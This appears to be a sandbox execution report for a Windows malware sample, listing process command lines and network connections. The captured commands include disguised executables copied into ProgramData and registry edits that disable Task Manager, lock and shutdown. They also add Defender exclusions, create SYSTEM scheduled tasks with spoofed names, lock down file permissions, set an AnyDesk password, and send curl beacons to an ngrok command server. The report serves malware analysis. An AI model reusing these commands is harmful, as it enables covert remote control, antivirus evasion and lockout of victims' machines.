"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --service

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --control

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --remove-password

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --set-password

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f4 0x4ec

C:\Users\Admin\AppData\Roaming\locked.exe

"C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\86DE.tmp\86DF.tmp\86E0.bat C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData\stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData\Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData\svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData\conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /run /tn "MicrosoftEdgeUpdateTaskList"

C:\ProgramData\Anydesk.exe

C:\ProgramData\Anydesk.exe

C:\Windows\system32\schtasks.exe

schtasks /run /tn "SystemTaskNavigator"

C:\ProgramData\stn.exe

C:\ProgramData\stn.exe

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\B3EB.tmp\B3EC.bat C:\ProgramData\stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\timeout.exe

timeout /T 30 /NOBREAK

C:\ProgramData\Anydesk.exe

"C:\ProgramData\Anydesk.exe" --control

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --remove-password

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --set-password

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id

C:\ProgramData\AnyDesk.exe

C:\ProgramData\Anydesk.exe --get-id

C:\Windows\system32\curl.exe

curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"message\": \"Admin-786591712\"}" https://guiding-cheetah-vast.ngrok-free.app/webhook

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command

C:\Windows\system32\curl.exe

curl -s -X GET https://guiding-cheetah-vast.ngrok-free.app/command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1

Network

Country Destination Domain Proto
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 a.magsrv.com udp
US 8.8.8.8:53 ad.a-ads.com udp
DE 136.243.4.18:443 ad.a-ads.com tcp
US 8.8.8.8:53 static.a-ads.com udp
DE 148.251.1.246:443 static.a-ads.com tcp
US 8.8.8.8:53 18.4.243.136.in-addr.arpa udp
US 8.8.8.8:53 246.1.251.148.in-addr.arpa udp
NL 95.211.229.246:443 s.magsrv.com tcp
DE 136.243.46.131:443 tsyndicate.com tcp
DE 136.243.134.97:443 pxl.tsyndicate.com tcp
US 8.8.8.8:53 vstream-10.sb-cd.com udp
DE 138.199.37.55:443 vstream-10.sb-cd.com tcp
DE 138.199.37.55:443 vstream-10.sb-cd.com tcp
NL 95.211.229.246:443 s.magsrv.com tcp
DE 136.243.46.131:443 tsyndicate.com tcp
US 8.8.8.8:53 pxl.tsyndicate.com udp
DE 213.239.193.198:443 pxl.tsyndicate.com tcp
US 8.8.8.8:53 a.magsrv.com udp
NL 95.211.229.246:443 s.magsrv.com tcp
US 8.8.8.8:53 198.193.239.213.in-addr.arpa udp

Files
